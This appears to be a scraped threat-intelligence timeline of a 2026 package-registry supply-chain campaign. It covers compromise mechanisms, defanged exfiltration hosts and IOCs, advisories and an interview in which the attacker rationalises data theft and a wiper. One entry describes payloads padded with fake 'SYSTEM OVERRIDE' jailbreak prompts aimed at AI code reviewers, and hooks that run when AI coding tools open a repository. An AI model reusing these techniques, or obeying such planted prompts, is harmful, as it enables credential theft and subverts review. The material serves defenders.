12 LAPSUS$
publishes stolen Checkmarx data
(1
event)
Ars
Technica
Mar 24-
LiteLLM (BerriAI)~120k downloads- 8 events
Compromised via PyPI token stolen
from Trivy-infected CI. Payload harvested credentials with persistence;
attacker claimed 54GB exfiltrated.
Security
Update
https://docs.litellm.ai/blog/security-update-march-2026
PYSEC-2026-2
https://github.com/pypa/advisory-database/blob/main/vulns/litellm/PYSEC-2026-2.yaml
25
IOCs
✦ Three's a Crowd
https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign
Phase 10 LiteLLM PyPI
(5
events, 2 milestones)
Mon, Mar
23- 14:31 UTC
Malicious
workflows pushed via compromised PAT
Attacker pushed Gato-X style
secrets exfil workflows to two BerriAI repos using
compromised krrishdholakia PAT. Both
added .github/workflows/test.yml that dumps all GitHub secrets
via ${{ toJSON(secrets) }}, encrypts with AES-256-CBC + RSA-4096, and
uploads as artifact. Harvested PYPI_PUBLISH token used the next day.
Litellm
404 error page not found
litellm-skills-
Code Commit 81c851c
https://github.com/BerriAI/litellm-skills/commit/81c851cc00313c44effd421712523f294b18391e
Analysis
https://github.com/BerriAI/litellm/issues/24518#issuecomment-4120996414
[Security]: litellm PyPI package
(v1.82.7 + v1.82.8) compromised — full timeline and status#24518
Tue, Mar 24- 10:39 & 10:52 UTC
Malicious
litellm 1.82.7 & 1.82.8 published to PyPI
Two malicious versions via
compromised maintainer account. 1.82.8: .pth file executes on
Python startup, exfil to models[.]litellm[.]cloud. 1.82.7: same
KICS payload in proxy_server.py → drops p.py, exfil to checkmarx[.]zone/raw.
Both harvest SSH keys, cloud credentials, env vars, crypto wallets. Discovered
when a fork bomb bug in the malware caused a crash.
GitHub
Issue
https://github.com/BerriAI/litellm/issues/24512
(code)
[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential
stealer #24512
Futuresearch
(first blog)
https://futuresearch.ai/blog/litellm-pypi-supply-chain-attack/
vxunderground
(link to X with QRcode)
https://x.com/vxunderground/status/2036534478416298484
HN
Discussion
https://news.ycombinator.com/item?id=47509089
12:44 UTC
Spam
flood targets security disclosure
~300
spam comments posted over ~6 hours to bury Issue
#24512. ~125 accounts used—majority overlap with Trivy spam botnet confirms
same operator. Mix of compromised developer accounts (stolen tokens) and
purchased dormant accounts.
~12:59 UTC
BerriAI
GitHub repos defaced
Via
compromised krrishdholakia account, multiple BerriAI repositories had
descriptions changed to "teampcp owns BerriAI".
14:00 UTC
Malicious
LiteLLM Versions Quarantined
PyPI quarantines litellm 1.82.7 and
1.82.8. 2h 32m exposure window. 119k+ downloads during attack window.
15:35 UTC
PYSEC-2026-2
Published
PyPA publishes LiteLLM advisory.
Project reinstated on PyPI.
Code: https://github.com/pypa/advisory-database/blob/main/vulns/litellm/PYSEC-2026-2.yaml
Wed, Mar
25-22:29 UTC
TeamPCP Announces Ransomware Partnerships
TeamPCP claims partnership approach with both Vect
Ransomware Group and Breachforums. Source
→ https://x.com/IntCyberDigest/status/2036933401240838564
(link to X)
Response
& Aftermath
(1 milestone)
Wed, Apr 1- 00:00 UTC
✓LiteLLM & Telnyx Adopt Trusted
PublishersBoth projects adopt PyPI Trusted
Publishers (https://docs.pypi.org/trusted-publishers/)
post-incident, eliminating long-lived API tokens. Confirmed in PyPI incident report (https://blog.pypi.org/posts/2026-04-02-incident-report-litellm-telnyx-supply-chain-attack/).
Mar 27 - Telnyx
~750 downloads - 3 events
Compromised via stolen PyPI
credentials. Payload used WAV steganography to deliver credential stealer.
v4.87.1 contained typo preventing automatic execution; v4.87.2 was fully
functional.
Security
Notice
https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026
PYSEC-2026-3
https://osv.dev/vulnerability/PYSEC-2026-3
32
IOCs
Phase
10 Telnyx PyPI
(3 milestones)
Fri, Mar 27- 07:34 UTC
Telnyx
Packages Quarantined
PyPI quarantines malicious telnyx 4.87.1 and 4.87.2
17:00 UTC
PYSEC-2026-3
Published
https://osv.dev/vulnerability/PYSEC-2026-3
OSV advisory PYSEC-2026-3 published for telnyx supply chain
compromise
Wed, Apr 1- 00:00 UTC
LiteLLM
& Telnyx Adopt Trusted Publishers
Both projects adopt PyPI Trusted
Publishers post-incident, eliminating long-lived API tokens. Confirmed in PyPI
incident report.
Apr 8-22
CanisterSprawl
(npm)- 1 events
Second-wave npm worm using new ICP
canister (cjn37-uyaaa-aaaac-qgnva-cai). @fairwords compromised Apr 8
(precursor). Main wave Apr 21-22: pgserve, @automagik, @openwebconcept. Worm
discovers npm tokens → bumps patch version → injects self → republishes. npm-to-PyPI
jump via .pth injection when PyPI tokens discovered.
11
IOCs
Analysis:
Socket
https://socket.dev/blog/namastex-npm-packages-compromised-canisterworm
StepSecurity
https://www.stepsecurity.io/blog/pgserve-compromised-on-npm-malicious-versions-harvest-credentials
Sonatype
https://www.sonatype.com/blog/self-propagating-npm-malware-turns-trusted-packages-into-attack-paths
GitGuardian
https://blog.gitguardian.com/three-supply-chain-campaigns-hit-npm-pypi-and-docker-hub-in-48-hours/
Fri, Apr 24
Apr 25
xploitrs
member "box turtl" interview
Inside
Darknet publishes interview with box turtl from xploitrs.
Claims: collaborated with TeamPCP on CanisterWorm; persistent access to victims
who haven't rotated; "touched hundreds of billions of dollars worth of
companies."
Apr 22 - Checkmarx KICS Docker Hub- 2 events
Compromised via persistent access
despite Mar 23 remediation. Malicious Docker images pushed; cascaded to
Bitwarden CLI.
Checkmarx
Update
https://checkmarx.com/blog/ongoing-security-updates/
17
IOCs
Wed, Apr 22- 14:00 UTC
xinference
PyPI poisoned (disputed attribution)
Versions 2.6.0, 2.6.1, 2.6.2
contain credential stealer with # hacked by teampcp comment marker.
~600,000 cumulative downloads. Exfiltration
to whereisitat.lucyatemysuperbox.space. TeamPCP denied involvement
via Twitter, claiming copycat.
JFrog
https://research.jfrog.com/post/xinference-compromise/
15:41 UTC
KICS
Docker Images Removed
Malicious digests disabled,
repository restored to March 3 known-good state. Publisher account suspended.
Apr
22- Bitwarden CLI- 1 events
Cascading compromise from KICS
Docker. Malicious npm package published; payload exfiltrated credentials. No
vault data affected.
Bitwarden
Statement
https://community.bitwarden.com/t/bitwarden-statement-on-checkmarx-supply-chain-incident/96127
CVE-2026-42994
https://www.cve.org/CVERecord?id=CVE-2026-42994
14
IOCs
Analysis:
JFrog
https://research.jfrog.com/post/bitwarden-cli-hijack/
Socket
https://socket.dev/blog/bitwarden-cli-compromised
Wed, Apr 22- 00:00 UTC
Bitwarden
CLI 2026.4.1 Released
Clean version published. Malicious
2026.4.0 deprecated with "DO NOT USE" warning.
Apr 24- elementary-data (PyPI)- 1 events
Compromised via GitHub Actions
script injection. Attacker comment triggered workflow with unsanitized ${{
github.event.comment.body }}, forged signed release via orphan tag dispatch.
~1.1M monthly downloads; same Session ID as LiteLLM/Xinference.
Official
Statement
MAL-2026-3083
https://osv.dev/vulnerability/MAL-2026-3083
19
IOCs
Analysis:
Trend
Micro
https://www.trendmicro.com/en_us/research/26/e/analyzing-teampcp-supply-chain-attacks.html
Fri, Apr 24- 22:10-22:20 UTC
elementary-data
PyPI compromised via script injection
~1.1M monthly
downloads compromised via GitHub Actions script injection.
Attacker realtungtungtungsahur (created Apr 22) posted malicious
comment to PR #2147; unsanitized ${{ github.event.comment.body }} in
workflow granted shell access. Exfil
via trin.tar.gz to igotnofriendsonlineorirl-imgonnakmslmao.skyhanni.cloud.
Apr 29-30- Mini Shai-Hulud- 6 events
Cross-ecosystem attack via stolen
CircleCI tokens. npm, PyPI, Packagist hit in 24hrs; payload targeted IDE hooks
with Russian locale exit.
https://www.wiz.io/blog/mini-shai-hulud-supply-chain-sap-npm
60
IOCs ✦ Mini Shai-Hulud Appears
Phase
13 Mini Shai-Hulud
(4
events)
Wed, Apr 29- 15:25–17:43 UTC
SAP
npm packages compromised
Four
packages poisoned within 2-hour window via stolen
CircleCI CLOUD_MTA_BOT_NPM_TOKEN: @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, mbt.
Russian locale exit (ru_*). Exfil
via OhNoWhatsGoingOnWithGitHub commit markers
to zero.masscan.cloud:443.
GHSA
https://github.com/cap-js/cds-dbs/security/advisories/GHSA-pvw4-cvr4-97p8
Thu, Apr 30- 12:45-13:27 UTC
PyTorch
Lightning PyPI packages compromised
lightning 2.6.2
and 2.6.3 compromised via stolen PyPI credentials. 42-minute exposure window.
Payload: hidden thread on import, downloads Bun runtime, executes ~11MB
obfuscated JS. Search marker: EveryBoiWeBuildIsAWormyBoi.
Lightning
Blog
https://lightning.ai/blog/pytorch-lightning-supply-chain-attack
GHSA
https://github.com/Lightning-AI/pytorch-lightning/security/advisories/GHSA-w37p-236h-pfx3
Aikido
https://www.aikido.dev/blog/pytorch-lightning-pypi-compromise-mini-shai-hulud
Semgrep
https://semgrep.dev/blog/2026/malicious-dependency-in-pytorch-lightning-used-for-ai-training/
15:00–17:00 UTC
intercom-client
npm package compromised
[email protected] published
with 11.7 MB router_runtime.js payload. ~2 hour exposure window.
Searches for OhNoWhatsGoingOnWithGitHub commits. 16 Dune-themed
GitHub handles (sardaukar, mentat, fremen, atreides...) as fallback. Repo
description: "A Mini Shai-Hulud has Appeared".
GHSA
https://github.com/intercom/intercom-node/security/advisories/GHSA-54pg-9963-v8vg
veryserious.systems
https://research.veryserious.systems/intercom-client-7-0-4-malware-analysis/
20:53–22:37 UTC
First
npm→Packagist cross-ecosystem spread
intercom/[email protected] compromised
via stolen credentials. 104-minute exposure window. Exploits Composer plugin
architecture for install-time code execution. Same payload and infrastructure
(zero.masscan.cloud) as npm attacks.
GHSA
https://github.com/intercom/intercom-php/security/advisories/GHSA-gr3r-crp5-qrrm
Intercom
Status
Socket.dev
https://socket.dev/blog/mini-shai-hulud-packagist-malicious-intercom-php-package-compromise
Semgrep
Response and aftermath – 2 events
Tue, Apr 28
Apr 28
TeamPCP
posts PGP-signed announcement
TeamPCP publishes signed statement
on Tor site. Claims own ransomware locker "CipherForce." Confirms
LAPSUS$ alliance. States "We have never used Vect encryption tools."
Fri, May 1- 13:51 UTC
Intercom
discloses iOS SDK certificate exposureIntercom Status
Intercom confirms Apple
Distribution Certificate used to sign iOS SDK was potentially
exposed. intercom-ios 19.5.6 and 19.5.7 affected. Certificate
revoked, releases re-signed with new certificate.
May 9 - Checkmarx Jenkins AST- 1 events
Compromised via persistent
Checkmarx access. Malicious Jenkins plugin injected; payload exfiltrated
pipeline secrets.
Checkmarx
Statement (404 error)
https://checkmarx.com/blog/supply-chain-security-incident-update-may-9/
13
IOCs
Fri, May 8
May 9
TeamPCP
leader interview (Inside Darknet)
Key claims: 500K+ machines
compromised; Trivy access came from unnamed partner; ShinyHunters scammed them; 17+
operators; name tributes TeamTNT.
May 7-11- Mini Shai-Hulud II (TanStack)- 5
events
Coordinated multi-ecosystem attack:
TanStack via GHA cache poisoning, Cemu via stolen maintainer credentials, 170+
packages across npm/PyPI in 5 hours. Cascaded to UiPath, Mistral AI, OpenAI,
Grafana, OpenSearch.
CVE-2026-45321
https://www.cve.org/CVERecord?id=CVE-2026-45321
46
IOCs
✦ Mini Shai-Hulud Strikes Again
https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised
Phase 14 Minin Shai-Hulud Strikes
Again
(5 events)
Mon, May 11- 11:29 UTC
TanStack
cache poisoned via pull_request_target
Attacker
forks TanStack/router to zblgg/configuration, opens PR #7378 at
10:49 UTC. Multiple force-pushes (11:01–11:11)
trigger pull_request_target workflow. Poisoned pnpm cache saved
at 11:29 UTC, then attacker force-pushes PR back to clean HEAD at 11:31 to hide
tracks.
19:20-19:26 UTC
TanStack
malicious packages published
PR #7382 merged at 19:16 UTC triggers release workflow using
poisoned cache. 84 malicious versions across
42 @tanstack/* packages published in 6-minute window
(19:20:39–19:26:14 UTC). Payload extracts OIDC tokens from /proc/
weekly downloads) affected.
TanStackPostmortem
https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
GHSA
https://github.com/TanStack/router/security/advisories/GHSA-g7cv-rxg3-hmpx
19:46 UTC
TanStack
compromise detected
External researcher opens issue
#7383. Team acknowledges ~20:00 UTC, begins deprecation at 20:19 UTC. Full
scope (84 versions) deprecated by 21:03 UTC. First removal at 22:13:38 UTC.
21:00:19-21:00:26 UTC
UiPath
packages compromised in 7-second burst
61 @uipath/* packages
republished in 7 seconds (21:00:19–21:00:26 UTC) from external attacker
infrastructure. Token stolen ~18:05 via worm in CI pipeline — ~2hr 55min
dwell time before detonation. Root cause: org-wide npm token mounted
across multiple CI repos + inconsistent post-install hardening. First external
signal at ~21:30, unpublish by ~22:30, full cleanup by 03:27 next day. Exposure
window: 21:00 → ~03:30 UTC. No production systems or customer data
accessed. UiPath postmortem → https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
22:45 UTC
Mistral AI packages compromised
@mistralai/* npm packages
compromised via worm spreading from TanStack. Exposure: npm 22:45–01:53 UTC
(~3hr), PyPI 00:05–03:05 UTC (~3hr). Root cause: compromised developer device,
not Mistral infra. npm versions were inoffensive (nonfunctional
malware), but PyPI [email protected] runs credential harvester on Linux at
import — downloads transformers.pyz from 83.142.209.194. Also
affected: @mistralai/mistralai-azure, @mistralai/mistralai-gcp, [email protected].
Mistral
Advisory
https://docs.mistral.ai/resources/security-advisories
npm
GHSA 404 error
https://github.com/mistralai/mistralai-client-js/security/advisories/GHSA-jgg6-4rpr-wfh7
PyPI
GHSA
https://github.com/mistralai/client-python/security/advisories/GHSA-wx9m-wx4f-4cmg
May 7-8
Cemu
Emulator- 2 events
GitHub releases compromised via
stolen maintainer (MangelSpec) credentials. AppImage/Ubuntu assets replaced
with credential-stealing payload; geofenced destructive logic targeting
Israel/Iran with 1-in-6 chance of rm -rf.
8
IOCs
Analysis:
Datadog
Security Labs
https://securitylabs.datadoghq.com/articles/backdoored-cemu-release-teampcp-supply-chain-campaign/
Thu, May 7
May 7-8
Cemu
GitHub releases compromised
angelSpec (long-term
co-author) account compromised; Linux AppImage and Ubuntu assets re-uploaded
via GitHub API—first non-bot asset upload in project history. Bypassed CI
entirely, indicating human account token theft rather than ephemeral CI token.
Part of coordinated May 11 attack wave (170 packages across npm/PyPI).
Datadog
Security Labs
https://securitylabs.datadoghq.com/articles/backdoored-cemu-release-teampcp-supply-chain-campaign/
Tue, May 12
Cemu
compromise discovered
Researchers connect Cemu backdoor
to broader Mini Shai-Hulud campaign; maintainers alerted. Same payload
architecture as TanStack/Mistral attacks.
May 18-19 -Mini Shai-Hulud III (Nx & @antv)- 5
events
Nx Console extension compromised
via TanStack-stolen creds (~5-day dwell); 639 @antv npm versions poisoned via
stolen 'atool' account. Payload installed persistent kitty-monitor backdoor.
CVE-2026-48027
https://www.cve.org/CVERecord?id=CVE-2026-48027
112
IOCs
✦ TeamPCP Hits AntV Supply Chain
https://www.wiz.io/blog/mini-shai-hulud-teampcp-hits-antv-supply-chain
Phase
15 Mini Shai-Hulud III (AntV)
(3
events)
Mon, May 18- 12:30-12:47 UTC
Nx
Console VS Code extension compromised
Malicious [email protected] published
to VS Code Marketplace at 12:30 UTC. Root cause: Nx contributor
installed @tanstack/[email protected] on May 11 20:43 UTC —
attacker exercised stolen GitHub token within 74 seconds. ~5-day dwell
time before publishing malicious extension. pnpm 10.14 silently
ignored minimum-release-age safeguard. 17-minute exposure (VS
Marketplace), 36 min (OpenVSX). ~6,000 activations. Payload: credential
harvester targeting GitHub, npm, AWS, Vault, K8s, 1Password. Persistence
via kitty-monitor daemon. Downstream impact: GitHub
employee infected → ~3,800 internal repos exfiltrated.
Nx
Postmortem
https://nx.dev/blog/nx-console-v18-95-0-postmortem
GHSA
https://github.com/nrwl/nx-console/security/advisories/GHSA-c9j4-9m59-847w
19:10-19:31 UTC
actions-cool
GitHub Actions hijacked
actions-cool/issues-helper (53
tags) and actions-cool/maintain-one-comment (15 tags). All tags
force-pushed to malicious imposter commits in coordinated 3-minute bursts.
Payload downloads Bun runtime, reads Runner.Worker process memory
via /proc/
Exfiltration to t.m-kosche.com:443
StepSecurity
Mon, May 18- 01:56-02:56 UTC
AntV
npm ecosystem mass compromise
639 malicious versions across 323
packages published in 22-minute burst via
compromised atool maintainer account. Two waves: 01:39-01:56 UTC
(first wave), 02:05-02:06 UTC (second wave with explicit Bun dependency). Major
packages: @antv/g2, @antv/g6, @antv/x6, @antv/l7, echarts-for-react (~1.1M
weekly), timeago.js, size-sensor. Payload: byte-identical 486-498KB
obfuscated Bun bundle via preinstall hook. Imposter commits injected
via optionalDependencies referencing orphan commits
in antvis/G2.
Wiz
https://www.wiz.io/blog/mini-shai-hulud-teampcp-hits-antv-supply-chain
Reponse and Aftermath
(2events)
Mon, May 18
May 18-19
GitHub
internal repositories exfiltrated
GitHub employee device compromised
via poisoned Nx Console VS Code extension. Attacker exfiltrated ~3,800
internal GitHub repositories. GitHub detected and contained the breach on May
18, began rotating critical secrets. No evidence of customer data impact
outside internal repos. Attack chain traced back to TanStack compromise (May
11) which leaked Nx developer credentials.
https://github.blog/security/investigating-unauthorized-access-to-githubs-internal-repositories/
Tue, May 19
May 20
TeamPCP
"T" interview (Ransomware Interviews)
Key claims: GitHub repos offered at $50k (highest bid $95k);
confirms LAPSUS$ collaboration; AI-assisted malware writing; exit
signal; Iranian wiper "more for fun." Interview → https://ransomware-interviews.base44.app/interview/teampcp[JH2]
TeamPCP
May 2026
I will just say you are speaking to T, so I will speak for
myself not my team members.
Q:
Your (currently banned) X account lists Israel as the
location and was created in October 2023. Also, you've deployed the
"Kamikaze" wiper specifically against Iranian victims. At the same
time, you've compromised Israeli companies like Aqua (Trivy) and Checkmarx.
Could you explain the apparent contradiction?
A:
These countries and the people they serve are simply evil.
Iran is a tyrannical regime who murders protesters in cold blood and funds
terrorists while the Israeli government are rampant warpigs who's security
software serves countries with similar behavior which makes them a prime
target. The wiper was more for the lulz, we insert it because we can and if it
does some collateral damage along the way, we will sleep happily. People all
say responding with pick a side, why? I don't negotiate with evil, I am upset
with what these people have turned power and faith into, it reflects badly on
everyone.
Q:
You've collaborated closely with LAPSUS$ and Breached.
Why partner with other groups instead of handling the full life cycle in-house?
A:
There is a lot of access here, it's better to create an eco
system and connections, that way it's easier to sell the data fast and move
access. LAPSUS$ have been good to work with, they are very trustworthy and they
bought everything together to start the op. A lot more is handled in house than
you think but the end result isn't always published under our group names —
usually just the quick one taps/bulk clones.
Q:
In the recent GitHub internal breach you're selling 4,000
private repos for $50k. Why not go directly to GitHub and demand a
significantly higher ransom? What's the strategy behind selling the data
instead?
A:
First come first serve, we do not extort we are simply here
for money upfront as soon as possible. If GitHub wanted the repos private they
would bid high for them like everyone else or ask our BIN price.
Q:
Most ransomware groups focus on encrypting victim files,
but TeamPCP seems to prioritize credential theft, supply-chain poisoning, and
data exfiltration rather than full encryption. Why did you choose this
approach?
A:
TeamPCP was initially an encrypt and extort group, it's
simply not necessary anymore, we get paid the same either way while taking much
less time and doing far less destruction to the businesses. I would also add
after the Vect failure, we are far less interested in encryption after seeing
the results we can achieve without it, this stopped us from pursuing it
entirely.
Q:
Since you became active, roughly how many organizations
have been impacted by your campaigns? Do you think the stolen credentials and
tokens lose value over time as developers realize they've been compromised and
start revoking keys?
A:
Tens of thousands of companies have been impacted, the
number of developers likely in the millions. Credentials that expire sooner and
large orgs are prioritized. If companies mass revoked as seen previously, then
it's not a worry — we would just find another way in the supply chain.
Q:
What inspired TeamPCP to start these operations in the
first place? Were any of you previously on the "legal" side of
cybersecurity? If yes, what made you cross over to the other side?
A:
I tried to find work doing legal offensive operations,
contract type work before this campaign and my would-be employer did something
extremely unethical, so I continued blackhatting separately. Otherwise this
would have played out very differently but yes I wanted to previously and still
would like to pursue something like this. The heat is not good to have on you
and I've made enough money to eat, house myself and take care of my team. Some
of us have even started donating our earnings because we simply don't need it
to survive anymore and that's all that matters. We don't want to or need to be
rich and we don't like causing damage to people but poor security pays.
Q:
Your campaigns show an extremely strong focus on
supply-chain attacks. What practical advice would you give to organizations and
developers on how to defend against attacks like these?
A:
Minimum release age, pin releases to hash, fine grain
tokens, know what or limit extensions your developers are using in their IDEs.
Socket will find the malware before the package is mature enough to hit your
machine and publish all of the IOCs/remediation steps for you or your company's
blue team should you get hit.
Q:
Threat actors like you constantly face better defenses,
law enforcement pressure, and faster incident response. What's your long-term
strategy for staying operational, and evolving faster than the defenders?
A:
We will always adapt against the blue team. With law
enforcement, my risk/reward ratio tells me my time has come soon to stop
operating.
Q:
Do you use AI tools in any part of your operations?
A:
Yes, we both code our malware by hand and with the
assistance of AI. Studying the different mechanisms used in the tools we are
exploiting are all done by a human. You can give any skid an LLM and they
wouldn't be able to replicate these attacks even with the source code and
postmortems fully public — which speaks for itself.
Q:
Is there anything else you'd like to say or share with my
followers (40k)?
A:
Let the results speak.
Q:
Bonus question 😊 I noticed your Tox
nickname is "the jellyfish who jumped up the mountain" — a reference
to the Shpongle track (right?). According to Simon Posford, the title refers to
a Darwinian evolution metaphor: even a jellyfish can climb a mountain one tiny
step at a time over millions of years. What's the story behind choosing this
name? Does this gradual-evolution metaphor connect in any way to TeamPCP's
philosophy or operations?
A:
Well, my circumstances weren't too great and I just kept
going and learning as much as possible, trying to exploit software, writing
malware and fucking up, sometimes without money for food or rent 24/7/365. I am
the jellyfish who jumped up the mountain.
May 19- DurableTask (Microsoft) ~2k downloads- 1
events
Compromised via PyPI token stolen
in AntV campaign. Payload targeted AWS SSM and K8s for lateral movement.
16
IOCs
✦ DurableTask Supply Chain Attack
https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack
Phase 16 DurableTask (Microsoft) 1
event
Tue, May
19- 16:19-16:54 UTC
Malicious
durabletask versions published
3 malicious versions published
to PyPI in 35-minute window: 1.4.1 (16:19 UTC), 1.4.2, 1.4.3 (16:54 UTC).
Payload: rope.pyz targeting AWS SSM and K8s for lateral movement. All
versions now yanked.
Jun 1-26
Miasma
/ Hades - 14 events
Multi-wave cross-ecosystem attack.
Wave 1: 90 malicious npm versions via OIDC publishing abuse. Wave 2:
binding.gyp technique bypassing install script detection. Wave 3: additional
npm accounts compromised. Wave 4 (Hades): crossed to PyPI via .pth startup
execution, 37 wheels across 19 packages.
RHSB-2026-006
https://access.redhat.com/security/vulnerabilities/RHSB-2026-006
Maintainer
Account
https://dev.to/icflorescu/the-bot-that-never-was-2mfp
12
IOCs
✦ Miasma Supply Chain Attack
https://www.wiz.io/blog/miasma-supply-chain-attack-targeting-redhat-npm-packages
Phase
17 Miasma/Hades 12 events
Mon, Jun 1- 10:53-14:24 UTC
First
wave: OIDC publishing abuse
Attacker exploits npm OIDC trusted
publishing via ephemeral branches. 9
documented oidc-* branches created (each lasting 1-73 seconds)
with counterfeit .github/workflows/ci.yml configured
with id-token: write. npm validates workflow filename only, not branch
protection status. 90 malicious versions across 32 packages published
with valid SLSA provenance (~80k weekly downloads). Exfil repo
fingerprint: Miasma: The Spreading Blight → Miasma : The
Spreading Blight (space before colon) after firedalazer dead-drop
activation.
15:54-20:24 UTC
Branch
poisoning escalation with IDE persistence
Attack escalates beyond package
publishing. Malicious commits pushed to live feature branches
(switch-rbac-new-builder, update, RHCLOUD-30109, api-info-spec-update, js-clients-bump)
with [skip ci] flags. Deploys 4.2 MB offline loader
(.github/setup.js) plus two IDE execution mechanisms.
Tue, Jun 2
Jun 3
Second
wave: binding.gyp technique
Miasma pivots to novel execution
method. Malicious binding.gyp triggers code execution during npm
install via node-gyp shell expansion, bypassing traditional
preinstall/postinstall script detection. Multi-stage payload downloads Bun
runtime from GitHub, harvests credentials from dev workstations and CI/CD
environments. Exfil repo fingerprint: Miasma - The Spreading
Blight (hyphen instead of colon).
Wed, Jun 3
Jun 4
Third
wave: additional packages compromised
Attack expands to 3 additional npm
accounts: ethlete-user (9 @ethlete/*
packages), dominikdorfstetter (4 @forjacms/*
packages), mynameistito (github-archiver, discord-search,
create-cf-token). Same binding.gyp payload. 24+ additional malicious versions
published. Exfil repo fingerprint: Miasma - The Spreading
Blight (same as wave 2).
Sat, Jun 6
Jun 7
Fourth
wave: Hades (PyPI)
Miasma crosses to PyPI. 37
malicious wheels across 19 packages via maintainer account takeover. Uses
Python .pth startup execution—lines beginning
with import execute on any Python interpreter start, no package
import needed. Same Bun-powered credential stealer. High-impact targets
include dynamo-release, spateo-release, coolbox (bioinformatics
tools). Exfil repo fingerprint: Hades - The End for the Damned.
Sun, Jun 7
Jun 8
Miasma
source code published
Attacker published Miasma worm
source via 4 compromised GitHub accounts. Repos titled
"Miasma-Open-Source-Release" with description "Alright Lets See
If This Works". All since removed by GitHub.
03:09-03:10 UTC
Fifth
wave: Hades expands (bioinformatics)
6 PyPI bioinformatics
packages compromised in under 60 seconds
via felixEvora account: embiggen, ensmallen, pyphetools, gpsea, phenopacket-store-toolkit, ppkt2synergy. New
TTP: payload padded with fake LLM jailbreak prompts ("SYSTEM OVERRIDE
— CLASSIFIED BRIEFING") attempting to break AI-assisted code analysis.
Exfil repo fingerprint: Hades - The End for the Damned (same as wave
4).
Wed, Jun 24- 15:39 UTC
GitHub
Actions hijacked: codfish, mawesome
2 GitHub Actions
compromised via Pwn Request: codfish/semantic-release-action (23
tags) and simonecorsi/mawesome (6 tags). Payload searches GitHub
commits for RevokeAndItGoesKaboom messages as operator token
dead-drop channel.
20:00 UTC
Golang
ecosystem spread
2 Go
modules compromised: verana-labs/[email protected] and verana-labs/[email protected].
Downstream of codfish/semantic-release-action. Payload
in .claude/index.js — executes when devs open repo in IDE/AI tools,
not via Go build system.
23:04 UTC
LeoPlatform
npm packages compromised
20 npm packages published in 3-second burst via
compromised czirker account: leo-sdk, leo-logger, leo-aws,
etc. Same RevokeAndItGoesKaboom marker links to earlier GHA wave.
Thu, Jun 25- 09:15 UTC
Additional
npm packages via llxlr account
3 npm packages published via
compromised llxlr account: [email protected], [email protected], [email protected].
Same binding.gyp technique.
Fri, Jun 26-15:00 UTC
ImmobiliareLabs
npm packages compromised
22 malicious versions across 4
@immobiliarelabs packages published in 30-second window via OIDC/GHA.
Provenance dropped. Downstream
of codfish/semantic-release-action compromise.
Maintainer
Response
[Security]: Malicious npm releases found
in @immobiliarelabs scope #1052
https://github.com/immobiliare/backstage-plugin-gitlab/issues/1052
Thu, Jun 4- 02:36-03:22 UTC
Microsoft
repositories compromised
Compromised GitHub account used to
inject malicious code into 42 repositories and 236
branches across Azure, Azure-Samples, and Microsoft GitHub orgs in 46
minutes. Same 4.5 MB .github/setup.js payload with IDE auto-execution
hooks (Claude Code, Gemini CLI, Cursor, VS Code). As of 14:00 UTC, malicious
code contained to GitHub—not pushed to other distribution channels.
Thu, Jul 2
Jul 2
✓FBI IC3 Advisory PublishedFBI Internet Crime Complaint
Center publishes Cybersecurity Advisory 260702 (https://www.ic3.gov/CSA/2026/260702.pdf)
on TeamPCP supply chain campaign. Covers full attack chain from Trivy through
Hades/Miasma, documents TTPs aligned with MITRE ATT&CK G1056, and
recommends mitigations.
Post-Compromise
Analysis
Deep-dive research into TeamPCP's post-compromise
activity—what happens after credentials are stolen from supply chain attacks.
Wiz Research May 2026
Tracking
TeamPCP: Investigating Post-Compromise Attacks Seen in the Wild
Analysis of how TeamPCP operationalizes stolen credentials
from supply chain compromises (Trivy, KICS, LiteLLM, Telnyx) to compromise
cloud environments.
Attack
Stages
- Secret
Validation — TruffleHog validates stolen AWS keys, Azure secrets,
and SaaS tokens via live API calls - Internal
Discovery — Within 24 hours: IAM enumeration (users, roles,
policies), compute (EC2, Lambda), storage (S3, RDS), and container
infrastructure (ECS task definitions, cluster mapping) - Code
Execution — GitHub workflow abuse via stolen PATs; Nord Stream
tool for malicious workflow creation; ECS Exec with SSM Agent for
container access; workflow log deletion - Data
Exfiltration — Bulk repository cloning via git.clone; mass
extraction from S3, Secrets Manager, and databases
Tools
& Infrastructure
- TruffleHog —
Credential validation - Nord
Stream — GitHub automation - Boto3 —
AWS API interactions - Mullvad
VPN & InterServer hosting for obfuscation
Detection
Signals
Unusual enumeration (ListUsers,
DescribeInstances), unexpected secret access patterns, mass clone operations,
workflow log deletion, API calls from VPN providers.
Kudelski Security April 2026
Investigating
Two Variants of the Trivy Supply Chain Compromise
Technical deep-dive comparing the
GitHub Action vs. container binary variants of the Trivy compromise.
Variant
1: Trivy Action
- Shell
script + embedded Python in entrypoint.sh - Reads /proc/PID/environ for
runner secrets - Scrapes
GitHub Actions runner memory for JSON secrets - Filesystem
harvester on self-hosted runners (SSH keys, cloud creds, K8s configs,
wallet keys) - AES-256-CBC
encryption with RSA wrapping - Fallback:
creates public repos named tpcp-docs - No
persistence—single execution
Variant
2: Trivy Binary
- Malicious
code compiled into Go binary (153MB ELF) - Two
embedded base64-encoded Python payloads - Persistent
backdoor via sysmon.py systemd service - Downloads
second-stage from Internet Computer Protocol (ICP) blockchain C2 - Targets
developer machines (non-CI environments) - Persistence—50-minute
polling cycle
Key
IOCs
C2 Domain scan.aquasecurtiy[.]org
Blockchain C2 tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io
Operational VPS nsa[.]cat
Attacker
IPs (from CloudTrail)
- 209.159.147.239 —
TruffleHog validation (NYC VPS) - 170.62.100.245 —
Cloud enumeration, S3 scanning (Kali) - 154.47.29.12 —
Org recon (Windows 11) - 103.75.11.59 —
Credential re-validation (macOS ARM)
Mitigation
Recommendations
- Use
OIDC federation instead of static IAM keys (minutes-long expiration
vs. indefinite) - Pin
container images by digest hash rather than tags to prevent automatic
redeployment - Disable
automatic container updates in production (Watchtower auto-deployed
the compromised aquasec/trivy:latest) - Apply
least-privilege IAM policies scoped to specific resources and
services - Enable
CloudTrail S3 data events for object-level visibility
